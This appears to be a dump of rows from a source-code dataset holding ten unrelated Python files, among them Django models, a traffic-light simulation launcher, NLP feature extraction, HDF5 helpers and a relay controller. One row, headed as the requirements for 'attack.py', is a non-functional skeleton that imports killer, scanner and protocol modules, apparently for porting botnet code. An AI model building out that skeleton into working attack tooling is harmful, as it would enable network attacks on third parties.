index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
400 | 68f3d3fce52d08381adc522ee032ef3181aec82a | # Generated by Django 2.2.3 on 2019-07-27 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('beerFriends', '0006_auto_20190726_1504'),
]
operations = [
migrations.AlterField(
model_name='beer',
name='rating',
field=models.FloatField(blank=True, null=True),
),
]
|
401 | 4775bef3623497e9bbe79ca2d4e9e9da0422c450 | #
#
#
# ------------------------------------------------------------------------------------------------------------------------------
#
# This program have been developed by Hamed Noori and with citiation of the related publicaitons
# can be used without permission.
# This program is for a novel architecture for traffic light control system which can form and manipulate
# vehicular platoons using clusters of traffic lights. This method, called Platoon-Based Intelligent Traffic Lights (PB-ITL)
# is based on coordinated traffic lights that are connected and are also able to communicate with vehicles wirelessly. PB-ITL
# groups traffic lights in clusters and each cluster tries to provide proper green status for the platoon of vehicles, using the
# Platooning concept which is seeking to utilize close to full capacity of roads.
# This lib is a Python-based program which can simulate a city with dynamic intelligent traffic lights.
# The author can be reach at noori@ece.ubc.ca
#
# ------------------------------------------------------------------------------------------------------------------------------
#
#
def start_simulation(sumo, scenario, network, begin, end, interval, output):
logging.debug("Finding unused port")
unused_port_lock = UnusedPortLock()
unused_port_lock.__enter__()
remote_port = find_unused_port()
logging.debug("Port %d was found" % remote_port)
logging.debug("Starting SUMO as a server")
sumo = subprocess.Popen(["D:\\PATH\\sumo-gui.exe", "-c", "D:\\\PATH\\Your.sumo.cfg", "--tripinfo-output", output,"--device.emissions.probability", "1.0" , "--remote-port", str(remote_port)], stdout=sys.stdout, stderr=sys.stderr)
unused_port_lock.release()
try:
traci.init(remote_port)
run(network, begin, end, interval)
except Exception:
logging.exception("Something bad happened")
finally:
logging.exception("Terminating SUMO")
terminate_sumo(sumo)
unused_port_lock.__exit__()
|
402 | 8102bdf4d29d2d3a1bdddbcfb6045b0660693996 | import os
import time
import argparse
import cPickle as pickle
from definitions import OieFeatures
from definitions.OieExample import OieExample
class FeatureLexicon:
"""
A wrapper around various dictionaries storing the mined data. It holds 5 dictionaries in total. Two of them store
mappings\n
- str => int\n
- int => str\n
about all features extracted. An update in these dicts causes an update in the dict holding frequencies, which maps\n
- str => float\n
The final two dicts contain mappings\n
- str => int
- int => str\n
about features which trigger with frequency that exceeds the given threshold.\n
All the string dictionaries keys are of the form 'featDef#value' (i.e. 'posPatternPath#JJ_VV_NN', 'bigrams#e1_t2')
"""
def __init__(self):
self.nextId = 0 # var pointing to the next available id number to be used when inserting new stuff
self.id2Str = {} # map: int => str
self.str2Id = {} # map: str => int
self.id2freq = {} # map: int => float. Gets updated only when 'get_or_add' ins invoked not 'get_or_add_pruned'
self.nextIdPruned = 0 # pointer
self.id2StrPruned = {} # map: int => str
self.str2IdPruned = {} # map: str => int
def get_or_add(self, s):
"""
Returns the numerical ID of the input string mapped by the 'str2Id' dictionary and increments its frequency by 1.
If the input string is not present, it inserts it in the 'str2Id' dict, sets its frequency to 1
and returns its new numerical ID.
:param s: string to search for. eg s = posPatternPath#JJ_VV_NN
:return: the id of the input string as an integer
"""
if s not in self.str2Id:
self.id2Str[self.nextId] = s
self.str2Id[s] = self.nextId
self.id2freq[self.nextId] = 1
self.nextId += 1
else:
self.id2freq[self.str2Id[s]] += 1
return self.str2Id[s]
def get_or_add_pruned(self, s):
"""
Returns the numerical ID of the input string mapped by the 'str2IdPruned' dictionary.
If the input string is not present, it inserts it in the 'str2IdPruned' dict and returns its new
numerical ID. There is no frequency update here.
:param s: string to search for belonging to the pruned ones, eg posPatternPath#NN_VV_ADJ_VBP
:return: the id of the input string as an integer
"""
if s not in self.str2IdPruned:
self.id2StrPruned[self.nextIdPruned] = s
self.str2IdPruned[s] = self.nextIdPruned
self.nextIdPruned += 1
return self.str2IdPruned[s]
def get_id(self, a_string):
"""
:param a_string: a feature such as 'bigrams#e1_t1'
:return: the numerical ID from the str2Id dict
"""
if a_string not in self.str2Id:
return None
return self.str2Id[a_string]
def get_str(self, idx):
"""
Returns the feature corresponding to the input numerical ID, as a string, eg 'bigrams#e1_t1'
:param idx: a numerical ID
:return: the feature corresponding to the input ID, mapped by sth id2Str dict
"""
if idx not in self.id2Str:
return None
else:
return self.id2Str[idx]
def get_str_pruned(self, idx):
"""
Returns the feature corresponding to the input numerical ID, only if the frequency of the feature triggering
has passed a given threshold (if the key is found in the id2StrPruned dict). Returns None if not found.
:param idx: a numerical ID
:return: the feature function name concatenated with '#' and the string value of it (i.e. 'bigrams#e1_t1', 'arg1_lower#java')
"""
if idx not in self.id2StrPruned:
return None
else:
return self.id2StrPruned[idx]
def get_freq(self, idx):
"""
Returns the number of times the feature, corresponding to the input ID, has occured.
:param idx: a numerical ID
:return: the frequency of the input ID's feature
"""
if idx not in self.id2freq:
return None
return self.id2freq[idx]
def get_feature_space_dimensionality(self):
"""
Returns the number of features that have passed the thresholding\n
:return: the number of (unique) entries in the id2strPruned dict
"""
return self.nextIdPruned
def build_feature_lexicon(raw_features, feature_extractors, lexicon):
# invokes internally get_or_add building the str2Id, id2Str, id2freq dicts since expand parameter is True
print 'Building feature lexicon...'
for ex_f in raw_features:
get_features(lexicon, feature_extractors, [ex_f[1], ex_f[4], ex_f[5], ex_f[7], ex_f[8], ex_f[6]], ex_f[2], ex_f[3], expand=True)
print ' Lexicon now has {} unique entries'.format(lexicon.nextId)
def get_features(lexicon, feature_extractors, info, arg1=None, arg2=None, expand=False):
"""
Returns a list of the numerical IDs of the features extracted from the input information. Input information
represents a single sentence in the mined dataset.
:type lexicon: FeatureLexicon
:param feature_extractors: a list of feature extraction functions as the ones defined in OieFeatures.py eg [trigger,
entityTypes, arg1_lower, arg2_lower, bow_clean, entity1Type, entity2Type, lexicalPattern, posPatternPath]
:param info: a list containing information of the input datapoint\n
Example\n
parsing : info[0] = '<-poss<-production->prep->for->pobj->'\n
entities : info[1] = 'JOBTITLE-JOBTITLE'\n
trig : info[2] = 'TRIGGER:review|performance'\n
sentence : info[3] = 'Supervised learning us a subset of learning methods'\n
pos : info[4] = 'DT NNP NNP , VBD IN DT NNP JJ NN NN NNP , VBZ JJ NN NN IN CD NNS IN DT NN NN IN DT NN .'\n
docPath : info[5] = './2000/01/01/1165031.xml'
:param arg1: entity1 string, eg 'Java'
:param arg2: entity2 string, eg 'C++'
:type expand: Boolean flag controlling whether str2Id, id2Str and id2freq dictionaries should be expanded as new
entries appear. If false it is assumed that inner dicts are already maximally populated.
:return: the list of feature IDs
"""
feats = []
for f in feature_extractors:
res = f(info, arg1, arg2)
if res is not None:
for feat_el in generate_feature_element(res):
_load_features(lexicon, f.__name__ + "#" + feat_el, feats, expand=expand)
return feats
def get_thresholded_features(lexicon, feature_extractors, info, arg1, arg2, threshold, expand=False):
"""
Returns a list of the numerical IDs of the features extracted from the input information which frequency value
exceed the given threshold. Input information represents a single sentence in the mined dataset.
:type lexicon: FeatureLexicon
:param feature_extractors: a list of feature exraction functions as the ones defined in OieFeatures.py eg [trigger,
entityTypes, arg1_lower, arg2_lower, bow_clean, entity1Type, entity2Type, lexicalPattern, posPatternPath]
:param info: a list containing information of the input datapoint\n
Example\n
- parsing : l[0] = '<-poss<-production->prep->for->pobj->'\n
- entities : l[1] = 'JOBTITLE-JOBTITLE'\n
- trig : l[2] = 'TRIGGER:review|performance'\n
- sentence : l[3] = 'Supervised learning us a subset of learning methods'\n
- pos : l[4] = 'DT NNP NNP , VBD IN DT NNP JJ NN NN NNP , VBZ JJ NN NN IN CD NNS IN DT NN NN IN DT NN .'\n
- docPath : l[5] = './2000/01/01/1165031.xml'
:param arg1: entity1 string, eg 'Java'
:param arg2: entity2 string, eg 'C++'
:param expand: flag controlling whether str2IdPruned, id2StrPruned dictionaries should be expanded as new
entries appear. If false it is assumed that inner dicts are already maximally populated.
:type expand: bool
:param threshold: integer to cut-off low frequency feature strings, such as i.e. infrequent bigrams of the form [bigrams#e1_t1, bigrams#e1_t2, .., posPatternPath#JJ_VV_NN]
:return: the list of feature IDs
"""
feats = []
for f in feature_extractors:
res = f(info, arg1, arg2)
if res is not None:
for feat_el in generate_feature_element(res):
_load_thresholded_features(lexicon, f.__name__ + "#" + feat_el, feats, threshold, expand=expand)
return feats
def generate_feature_element(extractor_output):
if type(extractor_output) == list:
for _ in extractor_output:
yield _
else:
yield extractor_output
def _load_features(lexicon, feat_str_id, feats, expand=False):
if expand:
feats.append(lexicon.get_or_add(feat_str_id))
else:
feat_id = lexicon.get_id(feat_str_id)
if feat_id is not None:
feats.append(feat_id)
def _load_thresholded_features(lexicon, feat_str_id, feats, thres, expand=False):
if expand:
if lexicon.id2freq[lexicon.get_id(feat_str_id)] > thres:
feats.append(lexicon.get_or_add_pruned(feat_str_id))
else:
feat_id = lexicon.get_id(feat_str_id)
if feat_id is not None:
if lexicon.id2freq[feat_id] > thres:
feats.append(lexicon.get_or_add_pruned(feat_str_id))
def read_examples(file_name):
"""
Reads the input tab-separated (\\\\t) file and returns the parsed data as a list of lists of strings. Each line, of the file to read, corresponds to a datapoint and has as many entries as the number of elements of the list returned by definitions.OieFeatures.getBasicCleanFeatures plus one.
Raises and IOError if a line found in the input file does not have 9 elements. The returned lists are of the form:\n
['counter_index', 'entry_1', 'entry_2', .., 'entry_9']\n
A sample file with the required format is '../data-sample.txt'.\n
:param file_name: a file path to read from
:type file_name: str
:return: of lists of strings. Each inner list has as first element a counter 0..N followed by the entries found in a line
returned by definitions.OieFeatures.getBasicCleanFeatures corresponding to the ones in the input file
:rtype: list
"""
start = time.time()
print 'Reading examples from tab separated file...'
count = 0
i = 0
with open(file_name, 'r') as fp:
relation_examples = []
for i, line in enumerate(fp):
line.strip()
if len(line) == 0 or len(line.split()) == 0:
raise IOError
else:
fields = line.split('\t')
assert len(fields) == 9, "a problem with the file format (# fields is wrong) len is " + str(len(fields)) + "instead of 9"
relation_examples.append([str(count)] + fields)
count += 1
print ' File contained {} lines'.format(i + 1)
print ' Datapoints with valid features encoded: {}'.format(count)
print ' Done in {:.2f} sec'.format(time.time() - start)
return relation_examples
def load_features(raw_features_struct, lexicon, examples_list, labels_dict, threshold):
"""
Encodes the input raw feature values into OieExample objects and appends to the input examples_list\n
Reads relation labels_dict, from the input features if found, and updates the corresponding keys in input labels_dict with a list of tokens representing the label\n
It also updates the "thresholded" 'str2IdPruned' and 'id2StrPruneddictionaries'
.. seealso:: :funct:`read_examples`\nTypically, the input raw features data structure is generated by the above function.\n
:param raw_features_struct: the input raw features data structure read from a tab separated file\n
A list of lists with each inner list following the below decoder_type for 'getCleanFeatures':
* feats[0] : counter
* feats[1] : dependency parsing <-, ->, ...
* feats[2] : entity 1 (eg java engineer)
* feats[3] : entity 2 (eg software engineer)
* feats[4] : entity-types-pair (eg JOBTITLE-JOBTITLE)
* feats[5] : trigger (eg TRIGGER:is)
* feats[6] : document path
* feats[7] : whole sentence
* feats[8] : sequence of pos tags between e1, e2 (exclusive)
* feats[9] : given label for semantic relation/class
* info = [feats[1], feats[4], feats[5], feats[7], feats[8], feats[6]]
:type raw_features_struct: list of lists of strings
:param lexicon: the dictionary "pruned" mappings are updated
:type lexicon: FeatureLexicon
:param examples_list: the list to populate with generated objects of type definitions.OieExample
:type examples_list: list
:param labels_dict: the dictionary to update the values with the read relation labels_dict (encoded as a list of tokens).
:type labels_dict: dict example ID (int) => goldstandard label (list of tokens/strings)
:param threshold: feature has to be found at least 'threshold' number of times
:type threshold: int
"""
start = time.clock()
print "Creating training examples and putting into list structure..."
index = 0
for i, feats in enumerate(raw_features_struct): # a list of lists of strings [[0, f1, f2, .., f9], [1, ..], .., [N, ..]]
feat_ids = get_thresholded_features(lexicon, feat_extractors,
[feats[1], feats[4], feats[5], feats[7], feats[8], feats[6]], feats[2], feats[3], expand=True,
threshold=threshold)
example = OieExample(feats[2], feats[3], feat_ids, feats[5], relation=feats[9])
labels_dict[index] = feats[-1].strip().split(' ')
index += 1
examples_list.append(example)
print ' Unique thresholded feature keys: {}'.format(lexicon.nextIdPruned)
print ' Done in {:.1f} sec'.format(time.clock() - start)
def pickle_objects(feat_extrs, feat_lex, dataset_splits, goldstandard_splits, a_file):
"""Pickles the input objects in the specified file.
:param feat_extrs: feature extractors
:type feat_extrs: list of callable objects
:param feat_lex: indexed feature values extracted from mined sentences
:type feat_lex: FeatureLexicon
:param dataset_splits: the collection of sentences split into 'train', 'test', 'valid' sets. Maps splits to examples
:type dataset_splits: dict; str {'train', 'test', 'valid'} => list (of instances of definitions.OieExample)
:param goldstandard_splits: the true relation labels. Maps splits {'train', 'test', 'valid'} to example-label mappings
:type goldstandard_splits: dict; str {'train', 'test', 'valid'} => dict (int => list). List holds the tokens (strings) representing the label for the example int ID
:param a_file: the target file to pickle the objects to
:type a_file: str
"""
start = time.time()
print 'Pickling feature extraction functions, feature lexicon, dataset_splits batch examples and goldstandard_splits labels...'
assert type(feat_extrs) == list, 'Expected a list of callables as the 1st object to be pickled'
for _ in feat_extrs:
assert callable(_) is True, 'Element {} of 1st object is not callable'.format(_)
assert isinstance(feat_lex, FeatureLexicon), "Expected an instance of FeatureLexicon as the 2nd object to be pickled. Got '{}' instead".format(type(feat_lex))
assert type(dataset_splits) == dict, 'Expected a dict as the 3rd object to be pickled'
for _ in dataset_splits:
assert _ in ['train', 'test', 'valid'], "The dict expected as the 3rd object to be pickled, has key '{}' not in ['train', 'test', 'valid']".format(_)
assert type(goldstandard_splits) == dict, 'Expected a dict as the 4th object to be pickled'
for _ in goldstandard_splits:
assert _ in ['train', 'test', 'valid'], "The dict expected as the 4th object to be pickled, has key '{}' not in ['train', 'test', 'valid']".format(_)
with open(a_file, 'wb') as pkl_file:
pickle.dump(feat_extrs, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(feat_lex, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(dataset_splits, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(goldstandard_splits, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
print ' Done in {:.2f} sec'.format(time.time() - start)
def unpickle_objects(a_file, verbose=False, debug=False):
"""
Unpickles the input file and returns references to the retrieved objects. Objects are assumed to have been pickled in the below order:\n
* list: its elements are callable objects representing feature extrating functions
* FeatureLexicon: holds the 5 dictionaries (mapping IDs, features (strings) and triggering frequencies), built from the mined sentences
* dict: has keys 'train', 'test', 'dev' each mapping to a list of instances of type definitions.OieExample
* dict: has keys 'train', 'test', 'dev' each mapping to a dict mapping integers (IDs) to lists of tokens. Each list can have one or more string tokens representing the relation label\n
:param a_file: file containing pickled objects
:type a_file: str
:param verbose: prints informative messages
:type verbose: bool
:param debug: if true prints the type of each object loaded
:type debug: bool
:return: references to the unpickled objects
:rtype: list, FeatureLexicon, dict, dict
"""
start = time.time()
with open(a_file, 'rb') as pkl_file:
if verbose:
print "Opened pickled file '{}'".format(a_file)
feature_extraction_functions = pickle.load(pkl_file)
if debug:
print "Loaded object of type '{}'".format(type(feature_extraction_functions).__name__)
assert type(feature_extraction_functions) == list
the_relation_lexicon = pickle.load(pkl_file)
if debug:
print "Loaded object of type '{}'".format(type(the_relation_lexicon).__name__)
assert isinstance(the_relation_lexicon, FeatureLexicon), "Expected an instance of FeatureLexicon as the 2nd object to be pickled. Got '{}' instead".format(type(the_relation_lexicon))
the_dataset = pickle.load(pkl_file)
if debug:
print "Loaded object of type '{}'".format(type(the_dataset).__name__)
assert type(the_dataset) == dict
the_goldstandard = pickle.load(pkl_file)
if debug:
print "Loaded object of type '{}'".format(type(the_goldstandard).__name__)
assert type(the_goldstandard) == dict
if verbose:
print ' loaded feature extractors:', ', '.join(("'" + str(_.__name__) + "'" for _ in feature_extraction_functions))
print ' loaded dataset with {} splits'.format(', '.join(("'" + _ + "'" for _ in the_dataset.iterkeys())))
print 'Done in {:.2f} sec'.format(time.time() - start)
return feature_extraction_functions, the_relation_lexicon, the_dataset, the_goldstandard
def get_cmd_arguments():
myparser = argparse.ArgumentParser(description='Processes an Oie file and add its representations to a Python pickled file.')
myparser.add_argument('input_file', metavar='input-file', help='input file in the Yao format, like data-sample.txt')
myparser.add_argument('pickled_dataset', metavar='pickled-dataset', help='pickle file to be used to store output (created if empty)')
myparser.add_argument('--batch', metavar='batch-name', default="train", nargs="?", help="name used as a reference in the pickled file, default is 'train'")
myparser.add_argument('--thres', metavar='threshold-value', default="0", nargs="?", type=int, help='minimum feature frequency')
myparser.add_argument('--test-mode', action='store_true', help='used for test files. If true the feature space is not expanded, so that previously unseen features are not added to the dicts')
return myparser.parse_args()
if __name__ == '__main__':
t_start = time.time()
args = get_cmd_arguments()
# reads the tabbed separated file into a list of lists of strings, representing extracted features
exs_raw_features = read_examples(args.input_file)
feat_extractors = OieFeatures.getBasicCleanFeatures() # list of callable feature extraction functions
relation_lexicon = FeatureLexicon()
dataset = {} # dict mapping keys 'train', 'test', 'dev' to a list of OieExample instances
# dict mapping each key 'train', 'test', 'dev' to a dictionary mapping int to a list of strings, representing goldstandard relation labels
# each inner list contains the tokens that comprise the label (i.e. ['is-a']). Most are expected to have a single token.
goldstandard = {}
if os.path.exists(args.pickled_dataset): # if found pickled objects, else pickle into new file
feat_extractors, relation_lexicon, dataset, goldstandard = unpickle_objects(args.pickled_dataset)
examples = [] # list of instances of definitions.OieExample
relation_labels = {} # dictionary mapping int to list of strings
if args.batch in dataset:
examples = dataset[args.batch] # list of OieExamples for the 'batch_name' input split of the dataset
# dict with the goldstandard labels (lists of token(s)) for the 'batch_name' input split of the dataset
relation_labels = goldstandard[args.batch]
else:
# insert the input batch name as a key in the 'dataset' dict, mapping to an empty list (for now)
dataset[args.batch] = examples
# insert the input batch name as a key in the 'goldstandard' dict, mapping to an empty dict (for now)
goldstandard[args.batch] = relation_labels
# update statistics and mappings for given split
build_feature_lexicon(exs_raw_features, feat_extractors, relation_lexicon)
# update the dataset split and goldstandard mappings with the thresholded extractions
load_features(exs_raw_features, relation_lexicon, examples, relation_labels, args.thres)
pickle_objects(feat_extractors, relation_lexicon, dataset, goldstandard, args.pickled_dataset)
|
403 | d82412055affc96d634957c953a35ea69b7e702f | '''Turning on or off, toggling and checking the status' of a specific relay'''
#!/bin/env python3
from time import sleep
from gpiozero import LED
RELAYS = [
LED(23),
LED(24),
LED(25),
LED(8),
LED(7),
LED(1),
LED(12),
LED(16)
]
def on_action(relay_option, number):
'''To turn on the chosen relay'''
relay_option.on()
print(f"relay {number} is turning on")
def off_action(relay_option, number):
'''To turn off the chosen relay'''
relay_option.off()
print(f"relay {number} is turning off")
def toggle_action(relay_option, number):
'''To toggle the chosen relay'''
print(f"relay {number} is toggling")
relay_option.on()
sleep(0.5)
relay_option.off()
sleep(0.5)
def print_help():
'''Print/show help for informations of the required parameter'''
print('''
Description
Arguments:
number number of relay 1 to 8
action on, off, or toggle
optional arguments:
h show this help message and exit
''')
def options():
'''Input the relay number or show help and check the input'''
input_str = input("Which relay? ")
while True:
if input_str == 'h':
print_help()
return
index = int(input_str) - 1
if 0 <= index <= 7:
relay_status(RELAYS[index], input_str)
relay_action(RELAYS[index], input_str)
relay_status(RELAYS[index], input_str)
return
else:
print("index out of range")
return
def relay_action(relay_number, num):
'''Do the given order(turn on, turn off, toggle) or raise error'''
action = input("Which action? ")
while True:
try:
return {
'on': on_action,
'off': off_action,
'toggle': toggle_action
}[action](relay_number, num)
except KeyError:
print("Try again")
return relay_action(relay_number, num)
def relay_status(relay_number, number):
'''Check initial relay's status'''
if relay_number.value == 1:
print(f"relay {number} is on")
else:
print(f"relay {number} is off")
while True:
options()
sleep(1)
|
404 | 862b529741d9c3e6cf7ca50272c8af724c56ac62 | from wasserstoff.wasserstoff import Config, Environment
__all__ = ['Config', 'Environment']
|
405 | 6d25b0fedf0d5081a3a0a93ddacc49748464d9d0 | # Required python libraries for attack.py
import socket
import os
import sys
from termcolor import colored
import StringIO
import time
# need to find Python equivalent libraries for these
import stdio
import stdlib
import unistd
# need to find Python equivalent libraries for these
import includes
import killer
import main
import protocol
import rand
import resolv
import scanner
import table
import util
def checksum_tcp_udp(ip_header, buffer_name, data_length, lenth):
return sum_checksum_tcp_udp
def checksum_generic(address, count):
return sum_checksum_generic
|
406 | e57b30a7a1cf987918abfb3cb7d612bdead2ddcd | from django.db import models
# Create your models here.
class Airlines(models.Model):
flight_number=models.CharField(max_length=8,unique=True)
airlines_id=models.CharField(max_length=10)
source=models.CharField(max_length=20)
destination=models.CharField(max_length=20)
departure=models.TimeField()
arrival=models.TimeField()
base_price=models.DecimalField(decimal_places=2,max_digits=10)
def __str__(self):
return self.flight_number
class Users(models.Model):
user_id=models.CharField(max_length=16)
email=models.EmailField(max_length=50,unique=True)
password=models.CharField(max_length=20)
phone_number=models.IntegerField()
gender=models.CharField(max_length=10)
def __str__(self):
return self.email
class Bookings(models.Model):
booking_id=models.AutoField(primary_key=True)
email=models.ForeignKey(Users,on_delete=models.CASCADE)
flight_num=models.ForeignKey(Airlines,on_delete=models.CASCADE,default='00000',editable=True)
|
407 | 2827a56c12c1e15a6fe26ce182aa07d76735d77f | '''
MDSANIMA Setup
'''
import sys
import pathlib
from setuptools import setup, find_packages
HERE = pathlib.Path(__file__).parent
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)
# This check and everything above must remain compatible with Python 2.7.
if CURRENT_PYTHON < REQUIRED_PYTHON:
sys.stderr.write("""==========================
Unsupported Python Version
==========================
This version of MDSANIMA requires Python {}.{}
but you're trying to install it on Python {}.{}
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
sys.exit(1)
VERSION = '0.2.0'
PACKAGE_NAME = 'mdsanima'
AUTHOR = 'Marcin Rozewski'
AUTHOR_EMAIL = 'marcinrozewski@gmail.com'
URL = 'https://github.com/mdsanima/mdsanima'
LICENSE = 'MIT'
DESCRIPTION = 'The package contains modules that will help in calculating rendering time.'
LONG_DESCRIPTION = (HERE / "README.rst").read_text()
LONG_DESC_TYPE = "text/x-rst"
INSTALL_REQUIRES = [
'humanfriendly'
]
KEYWORDS = [
'mdsanima',
'render time',
'calculator render time',
'blender',
'blener3d',
'rendering',
'houdini',
'sidefx',
'vfx',
'cinema4d',
'cycles',
'redshift',
'render engine',
'octane render',
'mantra',
'vray',
'clarisse ifx'
]
setup(name=PACKAGE_NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESC_TYPE,
author=AUTHOR,
license=LICENSE,
author_email=AUTHOR_EMAIL,
url=URL,
install_requires=INSTALL_REQUIRES,
packages=find_packages(),
extras_require={
"docs": [
'sphinx',
'sphinx-autoapi',
'sphinx-rtd-theme',
'sphinx-bootstrap-theme',
'sphinx-prompt',
'sphinx-tabs',
'recommonmark'
],
},
python_requires='>=3.6',
keywords=KEYWORDS,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Operating System :: MacOS',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Multimedia :: Graphics :: 3D Rendering',
'Topic :: Multimedia :: Graphics :: 3D Modeling',
],
) |
408 | d4ac5c6f08e9baa458fbe0ca7aa90c4d9372844f | import h5py
import numpy as np
#import tracking
dt = h5py.special_dtype(vlen=bytes)
def stringDataset(group, name, data, system=None):
dset = group.create_dataset(name, (1,), dtype=dt, data=data)
if system:
addSystemAttribute(dset, system)
return dset
def addStringAttribute(dset_or_group, name, data):
#return dset_or_group.attrs.create(name, np.string_(data)) # , (1,), dtype=dt)
dset_or_group.attrs[name] = bytes(data, 'utf-8')
def addSystemAttribute(dset_or_group, data):
return addStringAttribute(dset_or_group, 'system', data)
def add_dataset(group, name, data, system=None, dtype=None):
if type(data) is str:
return stringDataset(group, name, data, system)
else:
if dtype:
dset = group.create_dataset(name, data=data, dtype=dtype)
else:
dset = group.create_dataset(name, data=data)
if system:
addSystemAttribute(dset, system)
return dset
def saveH5Recursive(h5_filename, data_dict):
# import here to prevent circular import
try:
import tracking
except ImportError:
from . import tracking
def recurse_save(group, dict_or_data, dict_or_data_name, new_group=None):
if dict_or_data is None:
dict_or_data = 'None'
if group is None:
print("'recurse_save' has been called with None")
raise ValueError
if type(dict_or_data) is tracking.BeamProfile or type(dict_or_data) is tracking.ScreenDistribution:
dict_or_data = dict_or_data.to_dict()
if type(dict_or_data) is tuple:
dict_or_data = {'tuple_%i': x for i, x in enumerate(dict_or_data)}
if type(dict_or_data) is dict:
if type(dict_or_data_name) is int:
inner_key = str(dict_or_data_name)
try:
new_group = group.create_group(dict_or_data_name)
except Exception as e:
print(e)
print(dict_or_data_name, 'error')
#raise
if new_group is None:
raise ValueError
for key, val in dict_or_data.items():
try:
recurse_save(new_group, val, key)
except ValueError as e:
print(e)
print('I called recurse_save with None')
#import pdb; pdb.set_trace()
else:
mydata = dict_or_data
inner_key = dict_or_data_name
if type(mydata) is str:
add_dataset(group, inner_key, mydata.encode('utf-8'), 'unknown')
#elif type(mydata) is tuple:
# mydata2 = np.array(mydata)
# add_dataset(group, inner_key, mydata2, 'unknown')
elif (type(mydata) is list and type(mydata[0]) is str) or (hasattr(mydata, 'dtype') and mydata.dtype.type is np.str_):
# For list of strings, we need this procedure
try:
if hasattr(mydata, 'dtype') and mydata.dtype.type is np.str and len(mydata.shape) == 2:
mydata = mydata.flatten()
if len(mydata.shape) == 2:
new_list = [[n.encode('ascii') for n in arr] for arr in mydata]
max_str_size = max(max(len(n) for n in arr) for arr in mydata)
elif len(mydata.shape) == 1:
new_list = [n.encode('ascii') for n in mydata]
max_str_size = max(len(n) for n in mydata)
elif len(mydata.shape) == 0:
new_list = [mydata.encode('ascii')]
max_str_size = len(new_list[0])
#print('Max len %i' % max_str_size)
dset = group.create_dataset(inner_key, mydata.shape, 'S%i' % max_str_size, new_list)
#print(np.array(dset))
dset.attrs.create('system', 'unknown', (1,), dtype=dt)
except:
print('Error for key', inner_key)
print(type(mydata))
if type(mydata) is list:
print('type(mydata[0])')
print(type(mydata[0]))
print('mydata')
print(mydata)
elif hasattr(mydata, 'dtype') and mydata.dtype == np.dtype('O'):
if mydata.shape == ():
add_dataset(group, inner_key, mydata, 'unknown')
elif len(mydata.shape) == 1:
try:
add_dataset(group, inner_key, mydata, 'unknown')
except Exception as e:
print(e)
print('Error for key', inner_key)
print(group, inner_key)
else:
for i in range(mydata.shape[0]):
for j in range(mydata.shape[1]):
try:
add_dataset(group, inner_key+'_%i_%i' % (i,j), mydata[i,j], 'unknown')
except:
print('Error for key', inner_key)
print(group, inner_key, i, j)
else:
try:
add_dataset(group, inner_key, mydata, 'unknown')
except Exception as e:
print('Error', e)
print(inner_key, type(mydata))
with h5py.File(h5_filename, 'w') as dataH5:
for main_key, subdict in data_dict.items():
recurse_save(dataH5, subdict, main_key, None)
#recurse_save(dataH5, data_dict, 'none', new_group=dataH5)
def loadH5Recursive(h5_file):
def recurse_load(group_or_val, key, saved_dict_curr):
type_ = type(group_or_val)
try:
group_or_val[()]
except:
hasval = False
else:
hasval = True
if type_ is h5py._hl.files.File:
for new_key, new_group_or_val in group_or_val.items():
recurse_load(new_group_or_val, new_key, saved_dict_curr)
elif type_ is h5py._hl.group.Group:
saved_dict_curr[key] = new_dict = {}
for new_key, new_group_or_val in group_or_val.items():
recurse_load(new_group_or_val, new_key, new_dict)
elif type_ == np.dtype('O') and hasval and type(group_or_val[()]) is bytes:
saved_dict_curr[key] = group_or_val[()].decode()
elif type_ == h5py._hl.dataset.Dataset:
dtype = group_or_val.dtype
#if not hasattr(group_or_val, 'value'):
# print('Could not store key %s with type %s in dict' % (key, dtype))
# return
if dtype in (np.dtype('int64'), np.dtype('int32'), np.dtype('int16'), np.dtype('int8'), np.dtype('uint32'), np.dtype('uint16'), np.dtype('uint8'), np.dtype('uint64')):
saved_dict_curr[key] = np.array(group_or_val[()], dtype).squeeze()
if saved_dict_curr[key].size == 1:
saved_dict_curr[key] = int(saved_dict_curr[key])
elif dtype == np.dtype('bool'):
try:
saved_dict_curr[key] = bool(group_or_val[()])
except Exception as e:
print(e)
print('Could not store key %s with type %s in dict (1)' % (key, dtype))
elif dtype in (np.dtype('float64'), np.dtype('float32')):
saved_dict_curr[key] = np.array(group_or_val[()]).squeeze()
if saved_dict_curr[key].size == 1:
saved_dict_curr[key] = float(saved_dict_curr[key])
elif dtype.str.startswith('|S'):
if group_or_val[()].shape == (1,1):
saved_dict_curr[key] = group_or_val[()][0,0].decode()
elif group_or_val[()].shape == (1,):
saved_dict_curr[key] = group_or_val[()][0].decode()
elif group_or_val[()].shape == ():
saved_dict_curr[key] = group_or_val[()].decode()
else:
saved_dict_curr[key] = [x.decode() for x in group_or_val[()].squeeze()]
elif dtype.str == '|O':
saved_dict_curr[key] = group_or_val[()]
elif type(group_or_val[()]) is str:
saved_dict_curr[key] = group_or_val[()]
else:
print('Could not store key %s with type %s in dict (2)' % (key, dtype))
else:
print('Could not store key %s with type %s in dict (3)' % (key, type_))
saved_dict = {}
with h5py.File(h5_file.strip(), 'r') as f:
if 'none' in f:
recurse_load(f['none'], 'key', saved_dict)
saved_dict = saved_dict['key']
else:
recurse_load(f, 'key', saved_dict)
return saved_dict
|
409 | 4d388c912915c3f1f9e433f1342289f0864b3a11 | #/usr/bin/python
# File: UdpClient.py
# Author: David Zemon
# Project: Project1
#
# Created with: PyCharm Community Edition
"""
@description:
"""
__author__ = 'david'
import logging
from src.UDP import UDPClient
logging.basicConfig(level="DEBUG")
